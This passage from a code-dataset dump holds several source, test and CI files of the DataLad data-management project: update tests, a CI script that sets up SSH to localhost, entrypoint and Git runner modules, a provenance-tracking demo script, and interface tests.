merge=\"ff-only\",\n recursive=True, on_failure=\"ignore\")\n eq_(fetch_cmd.call_count, 1)\n\n if not ds_clone.repo.is_managed_branch():\n # Now the real thing.\n ds_clone.update(follow=\"parentds-lazy\", merge=\"ff-only\",\n recursive=True)\n ok_(op.lexists(str(ds_clone.pathobj / \"sub\" / \"foo\")))\n\n\n@with_tempfile(mkdir=True)\ndef test_update_adjusted_incompatible_with_ff_only(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n maybe_adjust_repo(ds_clone.repo)\n\n assert_in_results(\n ds_clone.update(merge=\"ff-only\", on_failure=\"ignore\"),\n action=\"update\", status=\"impossible\")\n assert_in_results(\n ds_clone.update(on_failure=\"ignore\"),\n action=\"update\", status=\"ok\")\n\n\[email protected](\"follow,action\", [\n # Ideally each combination would be checked, but this test is a bit slow.\n (\"parentds\", \"reset\"),\n (\"sibling\", \"checkout\"),\n])\n@slow # ~10s\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_update_how_subds_different(path=None, *, follow, action):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n ds_src_sub = ds_src.create(\"sub\")\n ds_src.save()\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n (ds_clone.pathobj / \"foo\").write_text(\"foo\")\n ds_clone.save()\n ds_clone_sub = Dataset(ds_clone.pathobj / \"sub\")\n\n (ds_src_sub.pathobj / \"bar\").write_text(\"bar\")\n ds_src.save(recursive=True)\n\n # Add unrecorded state to make --follow=sibling/parentds differ.\n (ds_src_sub.pathobj / \"baz\").write_text(\"baz\")\n ds_src_sub.save()\n\n ds_clone_repo = ds_clone.repo\n ds_clone_hexsha_pre = ds_clone_repo.get_hexsha()\n\n ds_clone_sub_repo = ds_clone_sub.repo\n ds_clone_sub_branch_pre = ds_clone_sub_repo.get_active_branch()\n\n res = ds_clone.update(follow=follow, how=\"merge\", how_subds=action,\n recursive=True)\n\n 
assert_result_count(res, 1, action=\"merge\", status=\"ok\",\n path=ds_clone.path)\n assert_result_count(res, 1, action=f\"update.{action}\", status=\"ok\",\n path=ds_clone_sub.path)\n\n ds_clone_hexsha_post = ds_clone_repo.get_hexsha()\n neq_(ds_clone_hexsha_pre, ds_clone_hexsha_post)\n neq_(ds_src.repo.get_hexsha(), ds_clone_hexsha_post)\n ok_(ds_clone_repo.is_ancestor(ds_clone_hexsha_pre, ds_clone_hexsha_post))\n\n eq_(ds_clone_sub.repo.get_hexsha(),\n ds_src_sub.repo.get_hexsha(None if follow == \"sibling\" else \"HEAD~\"))\n ds_clone_sub_branch_post = ds_clone_sub_repo.get_active_branch()\n\n if action == \"checkout\":\n neq_(ds_clone_sub_branch_pre, ds_clone_sub_branch_post)\n assert_false(ds_clone_sub_branch_post)\n else:\n eq_(ds_clone_sub_branch_pre, ds_clone_sub_branch_post)\n\n\n@slow # ~15s\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_update_reset_dirty(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n ds_src_s1 = ds_src.create(\"s1\")\n ds_src_s2 = ds_src.create(\"s2\")\n ds_src.save()\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n\n (ds_src_s1.pathobj / \"foo\").write_text(\"foo\")\n (ds_src_s2.pathobj / \"bar\").write_text(\"bar\")\n ds_src.save(recursive=True)\n\n ds_clone_s1 = Dataset(ds_clone.pathobj / \"s1\")\n ds_clone_s2 = Dataset(ds_clone.pathobj / \"s2\")\n (ds_clone_s1.pathobj / \"dirt\").write_text(\"\")\n\n res = ds_clone.update(follow=\"sibling\", how=\"reset\", recursive=True,\n on_failure=\"ignore\")\n\n assert_result_count(res, 1, path=ds_clone.path,\n action=f\"update.reset\", status=\"error\")\n assert_result_count(res, 1, path=ds_clone_s1.path,\n action=f\"update.reset\", status=\"error\")\n assert_result_count(res, 1, path=ds_clone_s2.path,\n action=f\"update.reset\", status=\"ok\")\n\n # s2 was reset...\n eq_(ds_src_s2.repo.get_hexsha(), ds_clone_s2.repo.get_hexsha())\n # ... but s1 and the top-level dataset stayed behind due to the dirty tree.\n eq_(ds_src.repo.get_hexsha(\"HEAD~\"), ds_clone.repo.get_hexsha())\n eq_(ds_src_s1.repo.get_hexsha(\"HEAD~\"), ds_clone_s1.repo.get_hexsha())\n\n assert_repo_status(ds_clone.path,\n modified=[ds_clone_s1.repo.path,\n ds_clone_s2.repo.path])\n\n\ndef test_process_how_args():\n # --merge maps onto --how values. It has no equivalent of --how-subds,\n # --which just gets set to --how's value when unspecified.\n eq_(_process_how_args(merge=False, how=None, how_subds=None),\n (None, None))\n eq_(_process_how_args(merge=True, how=None, how_subds=None),\n (\"merge\", \"merge\"))\n eq_(_process_how_args(merge=\"any\", how=None, how_subds=None),\n (\"merge\", \"merge\"))\n eq_(_process_how_args(merge=\"ff-only\", how=None, how_subds=None),\n (\"ff-only\", \"ff-only\"))\n\n # Values other than the default --merge=False can not be mixed with\n # non-default how values.\n with assert_raises(ValueError):\n _process_how_args(merge=True, how=\"merge\", how_subds=None)\n with assert_raises(ValueError):\n _process_how_args(merge=True, how=None, how_subds=\"merge\")\n\n # --how-subds inherits the value of --how...\n eq_(_process_how_args(merge=False, how=\"fetch\", how_subds=None),\n (None, None))\n eq_(_process_how_args(merge=False, how=\"merge\", how_subds=None),\n (\"merge\", \"merge\"))\n eq_(_process_how_args(merge=False, how=\"ff-only\", how_subds=None),\n (\"ff-only\", \"ff-only\"))\n # ... 
unless --how-subds is explicitly specified.\n eq_(_process_how_args(merge=False, how=\"merge\", how_subds=\"fetch\"),\n (\"merge\", None))\n\n\n@with_tempfile(mkdir=True)\ndef test_update_fetch_failure(path=None):\n path = Path(path)\n\n ds_a = Dataset(path / \"ds_a\").create()\n s1 = ds_a.create(\"s1\")\n ds_a.create(\"s2\")\n\n ds_b = install(source=ds_a.path, path=str(path / \"ds-b\"), recursive=True)\n\n # Rename s1 to make fetch fail.\n s1.pathobj.rename(s1.pathobj.parent / \"s3\")\n\n res = ds_b.update(recursive=True, on_failure=\"ignore\")\n assert_in_results(\n res,\n status=\"error\",\n path=str(ds_b.pathobj / \"s1\"),\n action=\"update\")\n assert_in_results(\n res,\n status=\"ok\",\n path=str(ds_b.pathobj / \"s2\"),\n action=\"update\")\n assert_in_results(\n res,\n status=\"ok\",\n path=ds_b.path,\n action=\"update\")\n" }, { "alpha_fraction": 0.6416666507720947, "alphanum_fraction": 0.6416666507720947, "avg_line_length": 19, "blob_id": "3d42aa21e6b36dbd33e1ba22cada2ce69b83245a", "content_id": "da8bbea15ab7205858ede313c3a5cb374c9a7c13", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 120, "license_type": "permissive", "max_line_length": 49, "num_lines": 6, "path": "/tools/ci/appveyor_ssh2localhost.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nset -e -u\n\ncat tools/ci/appveyor_ssh_config >> ~/.ssh/config\ncat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys\n" }, { "alpha_fraction": 0.5972180366516113, "alphanum_fraction": 0.600544273853302, "avg_line_length": 34.559139251708984, "blob_id": "eeb94cd733b015ac4064965077622a79f56ff07a", "content_id": "80742b4c25ceb634ee11ed5a26ffe3d4485c33c0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3307, "license_type": "permissive", "max_line_length": 87, "num_lines": 93, "path": "/datalad/support/entrypoints.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Core utilities\"\"\"\n\nimport logging\nimport sys\n\nfrom datalad.support.exceptions import CapturedException\n\nlgr = logging.getLogger('datalad.support.entrypoints')\n\n\ndef iter_entrypoints(group, load=False):\n \"\"\"Iterate over all entrypoints of a given group\n\n Parameters\n ----------\n group: str\n Name of the entry point group to iterator over, such as\n 'datalad.extensions'.\n load: bool, optional\n Whether to execute the entry point loader internally in a\n protected manner that only logs a possible exception and emits\n a warning, but otherwise skips over \"broken\" entrypoints.\n If False, the loader callable is returned unexecuted.\n\n Yields\n -------\n (name, module, loade(r|d))\n The first item in each yielded tuple is the entry point name (str).\n The second is the name of the module that contains the entry point\n (str). 
The type of the third items depends on the load parameter.\n It is either a callable that can be used to load the entrypoint\n (this is the default behavior), or the outcome of executing the\n entry point loader.\n \"\"\"\n lgr.debug(\"Processing entrypoints\")\n\n if sys.version_info < (3, 10):\n # 3.10 is when it was no longer provisional\n from importlib_metadata import entry_points\n else:\n from importlib.metadata import entry_points\n for ep in entry_points(group=group):\n if not load:\n yield ep.name, ep.module, ep.load\n continue\n\n try:\n lgr.debug('Loading entrypoint %s from %s', ep.name, group)\n yield ep.name, ep.module, ep.load()\n lgr.debug('Loaded entrypoint %s from %s', ep.name, group)\n except Exception as e:\n ce = CapturedException(e)\n lgr.warning(\n 'Failed to load entrypoint %s from %s: %s',\n ep.name, group, ce)\n continue\n lgr.debug(\"Done processing entrypoints\")\n\n\ndef load_extensions():\n \"\"\"Load entrypoint for any configured extension package\n\n Log a warning in case a requested extension is not available, or if\n a requested extension fails on load.\n\n Extensions to load are taken from the 'datalad.extensions.load'\n configuration item.\n \"\"\"\n from datalad import cfg\n load_extensions = cfg.get('datalad.extensions.load', get_all=True)\n if load_extensions:\n from datalad.utils import ensure_list\n exts = {\n ename: eload\n for ename, _, eload in iter_entrypoints('datalad.extensions')\n }\n for el in ensure_list(load_extensions):\n if el not in exts:\n lgr.warning('Requested extension %r is not available', el)\n continue\n try:\n exts[el]()\n except Exception as e:\n ce = CapturedException(e)\n lgr.warning('Could not load extension %r: %s', el, ce)\n" }, { "alpha_fraction": 0.518542468547821, "alphanum_fraction": 0.5201583504676819, "avg_line_length": 39.44771194458008, "blob_id": "c0c076eaa0a08412abbdb07da24db16eb3d8e59a", "content_id": "21926641258d6b498d7ba41ddb9c8159e9d69b6b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12377, "license_type": "permissive", "max_line_length": 113, "num_lines": 306, "path": "/datalad/runner/gitrunner.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Runner for command execution within the context of a Git repo\n\"\"\"\n\nimport logging\nimport os\nimport os.path as op\n\nfrom typing import Optional\n\nfrom datalad.dochelpers import borrowdoc\nfrom datalad.utils import (\n generate_file_chunks,\n make_tempfile,\n)\nfrom .runner import (\n GeneratorMixIn,\n WitlessRunner,\n)\n\n\nlgr = logging.getLogger('datalad.runner.gitrunner')\n\n# We use custom ssh runner while interacting with git\nGIT_SSH_COMMAND = \"datalad sshrun\"\n\n\nclass GitRunnerBase(object):\n \"\"\"\n Mix-in class for Runners to be used to run git and git annex commands\n\n Overloads the runner class to check & update GIT_DIR and\n GIT_WORK_TREE environment variables set to the absolute path\n if is defined and is relative path\n \"\"\"\n _GIT_PATH = None\n\n @staticmethod\n def _check_git_path():\n \"\"\"If using bundled git-annex, we would like to use 
bundled with it git\n\n Thus we will store _GIT_PATH a path to git in the same directory as annex\n if found. If it is empty (but not None), we do nothing\n \"\"\"\n if GitRunnerBase._GIT_PATH is None:\n from shutil import which\n\n # with all the nesting of config and this runner, cannot use our\n # cfg here, so will resort to dark magic of environment options\n if (os.environ.get('DATALAD_USE_DEFAULT_GIT', '0').lower()\n in ('1', 'on', 'true', 'yes')):\n git_fpath = which(\"git\")\n if git_fpath:\n GitRunnerBase._GIT_PATH = ''\n lgr.log(9, \"Will use default git %s\", git_fpath)\n return # we are done - there is a default git avail.\n # if not -- we will look for a bundled one\n GitRunnerBase._GIT_PATH = GitRunnerBase._get_bundled_path()\n lgr.log(9, \"Will use git under %r (no adjustments to PATH if empty \"\n \"string)\", GitRunnerBase._GIT_PATH)\n assert(GitRunnerBase._GIT_PATH is not None) # we made the decision!\n\n @staticmethod\n def _get_bundled_path():\n from shutil import which\n annex_fpath = which(\"git-annex\")\n if not annex_fpath:\n # not sure how to live further anyways! ;)\n alongside = False\n else:\n annex_path = op.dirname(op.realpath(annex_fpath))\n bundled_git_path = op.join(annex_path, 'git')\n # we only need to consider bundled git if it's actually different\n # from default. (see issue #5030)\n alongside = op.lexists(bundled_git_path) and \\\n bundled_git_path != op.realpath(which('git'))\n\n return annex_path if alongside else ''\n\n @staticmethod\n def get_git_environ_adjusted(env=None):\n \"\"\"\n Replaces GIT_DIR and GIT_WORK_TREE with absolute paths if relative path and defined\n \"\"\"\n # if env set copy else get os environment\n git_env = env.copy() if env else os.environ.copy()\n if GitRunnerBase._GIT_PATH:\n git_env['PATH'] = op.pathsep.join([GitRunnerBase._GIT_PATH, git_env['PATH']]) \\\n if 'PATH' in git_env \\\n else GitRunnerBase._GIT_PATH\n\n for varstring in ['GIT_DIR', 'GIT_WORK_TREE']:\n var = git_env.get(varstring)\n if var: # if env variable set\n if not op.isabs(var): # and it's a relative path\n git_env[varstring] = op.abspath(var) # to absolute path\n lgr.log(9, \"Updated %s to %s\", varstring, git_env[varstring])\n\n if 'GIT_SSH_COMMAND' not in git_env:\n git_env['GIT_SSH_COMMAND'] = GIT_SSH_COMMAND\n git_env['GIT_SSH_VARIANT'] = 'ssh'\n git_env['GIT_ANNEX_USE_GIT_SSH'] = '1'\n\n # We are parsing error messages and hints. 
For those to work more\n # reliably we are doomed to sacrifice i18n effort of git, and enforce\n # consistent language of the messages\n git_env['LC_MESSAGES'] = 'C'\n # But since LC_ALL takes precedence, over LC_MESSAGES, we cannot\n # \"leak\" that one inside, and are doomed to pop it\n git_env.pop('LC_ALL', None)\n\n return git_env\n\n\nclass GitWitlessRunner(WitlessRunner, GitRunnerBase):\n \"\"\"A WitlessRunner for git and git-annex commands.\n\n See GitRunnerBase it mixes in for more details\n \"\"\"\n\n # Behavior option to load up from config upon demand\n _CFG_PATHSPEC_FROM_FILE = None\n\n @borrowdoc(WitlessRunner)\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._check_git_path()\n\n def _get_adjusted_env(self, env=None, cwd=None, copy=True):\n env = GitRunnerBase.get_git_environ_adjusted(env=env)\n return super()._get_adjusted_env(\n env=env,\n cwd=cwd,\n # git env above is already a copy, so we have no choice,\n # but we can prevent duplication\n copy=False,\n )\n\n def _get_chunked_results(self,\n cmd,\n files,\n *,\n protocol=None,\n cwd=None,\n env=None,\n pathspec_from_file: Optional[bool] = False,\n **kwargs):\n\n assert isinstance(cmd, list)\n\n if self._CFG_PATHSPEC_FROM_FILE is None:\n from datalad import cfg # avoid circular import\n GitWitlessRunner._CFG_PATHSPEC_FROM_FILE = cfg.obtain('datalad.runtime.pathspec-from-file')\n assert GitWitlessRunner._CFG_PATHSPEC_FROM_FILE in ('multi-chunk', 'always')\n file_chunks = list(generate_file_chunks(files, cmd))\n\n if pathspec_from_file and (len(file_chunks) > 1 or GitWitlessRunner._CFG_PATHSPEC_FROM_FILE == 'always'):\n # if git supports pathspec---from-file and we need multiple chunks to do,\n # just use --pathspec-from-file\n with make_tempfile(content=b'\\x00'.join(f.encode() for f in files)) as tf:\n cmd += ['--pathspec-file-nul', f'--pathspec-from-file={tf}']\n yield self.run(\n cmd=cmd,\n protocol=protocol,\n cwd=cwd,\n env=env,\n **kwargs)\n return\n\n # \"classical\" chunking\n for i, file_chunk in enumerate(file_chunks):\n # do not pollute with message when there only ever is a single chunk\n if len(file_chunk) < len(files):\n lgr.debug(\n 'Process file list chunk %i (length %i)', i, len(file_chunk))\n\n yield self.run(\n cmd=cmd + ['--'] + file_chunk,\n protocol=protocol,\n cwd=cwd,\n env=env,\n **kwargs)\n\n def run_on_filelist_chunks(self,\n cmd,\n files,\n *,\n protocol=None,\n cwd=None,\n env=None,\n pathspec_from_file: Optional[bool] = False,\n **kwargs):\n \"\"\"\n Run a git-style command multiple times if `files` is too long,\n using a non-generator protocol, i.e. a protocol that is not\n derived from `datalad.runner.protocol.GeneratorMixIn`.\n\n Parameters\n ----------\n cmd : list\n Sequence of program arguments.\n files : list\n List of files.\n protocol : WitlessProtocol, optional\n Protocol class handling interaction with the running process\n (e.g. output capture). A number of pre-crafted classes are\n provided (e.g `KillOutput`, `NoCapture`, `GitProgress`).\n cwd : path-like, optional\n If given, commands are executed with this path as PWD,\n the PWD of the parent process is used otherwise. Overrides\n any `cwd` given to the constructor.\n env : dict, optional\n Environment to be used for command execution. If `cwd`\n was given, 'PWD' in the environment is set to its value.\n This must be a complete environment definition, no values\n from the current environment will be inherited. 
Overrides\n any `env` given to the constructor.\n pathspec_from_file : bool, optional\n Could be set to True for a `git` command which supports\n --pathspec-from-file and --pathspec-file-nul options. Then pathspecs\n would be passed through a temporary file.\n kwargs :\n Passed to the Protocol class constructor.\n\n Returns\n -------\n dict\n At minimum there will be keys 'stdout', 'stderr' with\n unicode strings of the cumulative standard output and error\n of the process as values.\n\n Raises\n ------\n CommandError\n On execution failure (non-zero exit code) this exception is\n raised which provides the command (cmd), stdout, stderr,\n exit code (status), and a message identifying the failed\n command, as properties.\n FileNotFoundError\n When a given executable does not exist.\n \"\"\"\n\n assert not issubclass(protocol, GeneratorMixIn), \\\n \"cannot use GitWitlessRunner.run_on_filelist_chunks() \" \\\n \"with a protocol that inherits GeneratorMixIn, use \" \\\n \"GitWitlessRunner.run_on_filelist_chunks_items_() instead\"\n\n results = None\n for res in self._get_chunked_results(cmd=cmd,\n files=files,\n protocol=protocol,\n cwd=cwd,\n env=env,\n pathspec_from_file=pathspec_from_file,\n **kwargs):\n if results is None:\n results = res\n else:\n for k, v in res.items():\n results[k] += v\n return results\n\n def run_on_filelist_chunks_items_(self,\n cmd,\n files,\n *,\n protocol=None,\n cwd=None,\n env=None,\n pathspec_from_file: Optional[bool] = False,\n **kwargs):\n \"\"\"\n Run a git-style command multiple times if `files` is too long,\n using a generator protocol, i.e. a protocol that is\n derived from `datalad.runner.protocol.GeneratorMixIn`.\n\n Parameters\n ----------\n see GitWitlessRunner.run_on_filelist_chunks() for a definition\n of parameters\n\n Returns\n -------\n Generator that yields output of the cmd\n \"\"\"\n\n assert issubclass(protocol, GeneratorMixIn), \\\n \"cannot use GitWitlessRunner.run_on_filelist_chunks_items_() \" \\\n \"with a protocol that does not inherits GeneratorMixIn, use \" \\\n \"GitWitlessRunner.run_on_filelist_chunks() instead\"\n\n for chunk_generator in self._get_chunked_results(cmd=cmd,\n files=files,\n protocol=protocol,\n cwd=cwd,\n env=env,\n pathspec_from_file=pathspec_from_file,\n **kwargs):\n yield from chunk_generator\n" }, { "alpha_fraction": 0.7437995672225952, "alphanum_fraction": 0.7565839886665344, "avg_line_length": 58.25757598876953, "blob_id": "ed42cdfa157bfe73546696eac23c8cb26d9f3e98", "content_id": "eaac8d91e99096dc582a553bf850525d6fb047b8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3911, "license_type": "permissive", "max_line_length": 256, "num_lines": 66, "path": "/docs/casts/simple_provenance_tracking.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"It is often helpful to keep track of the origin of data files. When generating data from other data, it is also useful to know what process led to these new data and what inputs were used.\"\nsay \"DataLad can be used to keep such a record...\"\n\nsay \"We start with a dataset\"\nrun \"datalad create demo\"\nrun \"cd demo\"\n\nsay \"Let's say we are taking a mosaic image composed of flowers from Wikimedia. 
We want extract some of them into individual files -- maybe to use them in an art project later.\"\nsay \"We can use git-annex to obtain this image straight from the web\"\nrun \"git annex addurl https://upload.wikimedia.org/wikipedia/commons/a/a5/Flower_poster_2.jpg --file sources/flowers.jpg\"\n\nsay \"We save it in the dataset\"\nrun \"datalad save -m 'Added flower mosaic from wikimedia'\"\n\nsay \"Now we can use DataLad's 'run' command to process this image and extract one of the mosaic tiles into its own JPEG file. Let's extract the St. Bernard's Lily from the upper left corner.\"\nrun \"datalad run convert -extract 1522x1522+0+0 sources/flowers.jpg st-bernard.jpg\"\n\nsay \"All we have to do is prefix ANY command with 'datalad run'. DataLad will inspect the dataset after the command has finished and save all modifications.\"\nsay \"In order to reliably detect modifications, a dataset must not contain unsaved modifications prior to running a command. For example, if we try to extract the Scarlet Pimpernel image with unsaved changes...\"\nrun \"touch dirt\"\nrun_expfail \"datalad run convert -extract 1522x1522+1470+1470 sources/flowers.jpg pimpernel.jpg\"\n\nsay \"It has to be clean\"\nrun \"rm dirt\"\nrun \"datalad run convert -extract 1522x1522+1470+1470 sources/flowers.jpg pimpernel.jpg\"\n\nsay \"Every processing step is saved in the dataset, including the exact command and the content that was changed.\"\nrun \"git show --stat\"\n\nsay \"On top of that, the origin of any dataset content obtained from elsewhere is on record too\"\nrun \"git annex whereis sources/flowers.jpg\"\n\nsay \"Based on this information, we can always reconstruct how any data file came to be -- across the entire life-time of a project\"\nrun \"git log --oneline @~3..@\"\nrun \"datalad diff --revision @~3..@\"\n\nsay \"We can also rerun any previous commands with 'datalad rerun'. Without any arguments, the command from the last commit will be executed.\"\nrun \"datalad rerun\"\nrun \"git log --oneline --graph --name-only @~3..@\"\n\nsay \"In this case, a new commit isn't created because the output file didn't change. But let's say we add a step that displaces the Lily's pixels by a random amount.\"\nrun \"datalad run convert -spread 10 st-bernard.jpg st-bernard-displaced.jpg\"\n\nsay \"Now, if we rerun the previous command, a new commit is created because the output's content changed.\"\nrun \"datalad rerun\"\nrun \"git log --graph --oneline --name-only @~2..\"\n\nsay \"(We don't actually want the repeated 'spread' command, so let's reset to the parent commit.)\"\nrun \"git reset --hard @^\"\n\nsay \"We can also rerun multiple commits (with '--since') and choose where HEAD is when we start rerunning from (with --onto). When both arguments are set to empty strings, it means 'rerun all command with HEAD at the parent of the first commit a command'.\"\nsay \"In other words, you can 'replay' the commands.\"\nrun \"datalad rerun --since= --onto= --branch=verify\"\n\nsay \"Now we're on a new branch, 'verify', that contains the replayed history.\"\nrun \"git log --oneline --graph master verify\"\n\nsay \"Let's compare the two branches.\"\nrun \"datalad diff --revision master..verify\"\n\nsay \"We can see that the step that involved a random component produced different results.\"\nsay \"And these are just two branches, so you can compare them using normal Git operations. 
The next command, for example, marks which commits are 'patch-equivalent'.\"\n\nrun \"git log --oneline --left-right --cherry-mark master...verify\"\n\nsay \"Notice that all commits are marked as equivalent (=) except the 'random spread' ones.\"\n" }, { "alpha_fraction": 0.5783277153968811, "alphanum_fraction": 0.5891398191452026, "avg_line_length": 30.530303955078125, "blob_id": "3446c46ad16ce4127760af202ce936b52067d873", "content_id": "aaa58af41726286296a5614eba4ac75f289dfcc8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4162, "license_type": "permissive", "max_line_length": 101, "num_lines": 132, "path": "/datalad/tests/test_interface.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test command call wrapper\n\"\"\"\n\nimport re\n\nfrom datalad.interface.base import (\n Interface,\n get_api_name,\n)\nfrom datalad.support import constraints as cnstr\nfrom datalad.support.param import Parameter\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_in,\n assert_is,\n assert_raises,\n assert_re_in,\n assert_true,\n swallow_outputs,\n)\n\n\nclass Demo(Interface):\n \"\"\"I am a demo\"\"\"\n _params_ = dict(\n\n demoposarg=Parameter(\n doc=\"demoposdoc\",\n constraints=cnstr.EnsureInt(),\n nargs=2),\n\n demooptposarg1=Parameter(\n args=('demooptposarg1',),\n doc=\"demooptposdoc1\",\n constraints=cnstr.EnsureInt(),\n nargs='?'),\n\n demooptposarg2=Parameter(\n args=('demooptposarg2',),\n doc=\"demooptposdoc2\",\n constraints=cnstr.EnsureInt(),\n nargs='?'),\n\n demoarg=Parameter(\n doc=\"demodoc\",\n constraints=cnstr.EnsureInt()))\n\n def __call__(self, demoposarg, demooptposarg1=99, demooptposarg2=999, demoarg=100):\n return demoarg\n\n\ndef test_param():\n # having a parameter with no information is fine\n # it doesn't need a name, because it comes from the signature\n # of the actual implementation that is described\n p = Parameter()\n pname = 'testname'\n # minimal docstring\n assert_equal(pname, p.get_autodoc('testname'))\n doc = 'somedoc'\n p = Parameter(doc=doc)\n assert_equal('%s\\n %s.' 
% (pname, doc), p.get_autodoc('testname'))\n # constraints\n p = Parameter(doc=doc, constraints=cnstr.EnsureInt() | cnstr.EnsureStr())\n autodoc = p.get_autodoc('testname')\n assert_true('int or str' in autodoc)\n\n with assert_raises(ValueError) as cmr:\n Parameter(unknown_arg=123)\n assert_in('Detected unknown argument(s) for the Parameter: unknown_arg',\n str(cmr.value))\n\n\ndef test_interface():\n di = Demo()\n\n import argparse\n parser = argparse.ArgumentParser()\n\n from datalad.cli.parser import setup_parser_for_interface\n setup_parser_for_interface(parser, di)\n with swallow_outputs() as cmo:\n assert_equal(parser.print_help(), None)\n assert(cmo.out)\n assert_equal(cmo.err, '')\n args = parser.parse_args(['42', '11', '1', '2', '--demoarg', '23'])\n assert_is(args.demoarg, 23)\n assert_equal(args.demoposarg, [42, 11])\n assert_equal(args.demooptposarg1, 1)\n assert_equal(args.demooptposarg2, 2)\n\n # wrong type\n with swallow_outputs() as cmo:\n assert_raises(SystemExit, parser.parse_args, ['--demoarg', 'abc'])\n # that is what we dump upon folks atm. TODO: improve reporting of illspecified options\n assert_re_in(\".*invalid constraint:int value:.*\",\n cmo.err, re.DOTALL)\n\n # missing argument to option\n with swallow_outputs() as cmo:\n assert_raises(SystemExit, parser.parse_args, ['--demoarg'])\n assert_re_in(\".*--demoarg: expected one argument\", cmo.err, re.DOTALL)\n\n # missing positional argument\n with swallow_outputs() as cmo:\n assert_raises(SystemExit, parser.parse_args, [''])\n # PY2|PY3\n assert_re_in(\".*error: (too few arguments|the following arguments are required: demoposarg)\",\n cmo.err, re.DOTALL)\n\n\ndef test_name_generation():\n assert_equal(\n get_api_name((\"some.module\", \"SomeClass\")),\n 'module')\n assert_equal(\n get_api_name((\"some.module\", \"SomeClass\", \"cmdline-override\")),\n 'module')\n assert_equal(\n get_api_name((\"some.module\",\n \"SomeClass\",\n \"cmdline_override\",\n \"api_override-dont-touch\")),\n \"api_override-dont-touch\")\n" }, { "alpha_fraction": 0.580012857913971, "alphanum_fraction": 0.5838689208030701, "avg_line_length": 27.290908813476562, "blob_id": "5c6d4cfee42d6fddf67bfbb410071e691aa72d1a", "content_id": "16254166d7dd9bc971a1ee61f713f3583ff6dba2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6224, "license_type": "permissive", "max_line_length": 87, "num_lines": 220, "path": "/datalad/support/json_py.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Simple wrappers to get uniform JSON input and output\n\"\"\"\n\n\nimport io\nimport codecs\nfrom os.path import (\n dirname,\n exists,\n lexists,\n)\nfrom os import makedirs\nimport os\nimport os.path as op\nimport json\n\nfrom datalad.support.exceptions import CapturedException\n\n\n# produce relatively compact, but also diff-friendly format\njson_dump_kwargs = dict(\n indent=0,\n separators=(',', ':\\n'),\n sort_keys=True,\n ensure_ascii=False,)\n\n# achieve minimal representation, but still deterministic\ncompressed_json_dump_kwargs = dict(\n json_dump_kwargs,\n 
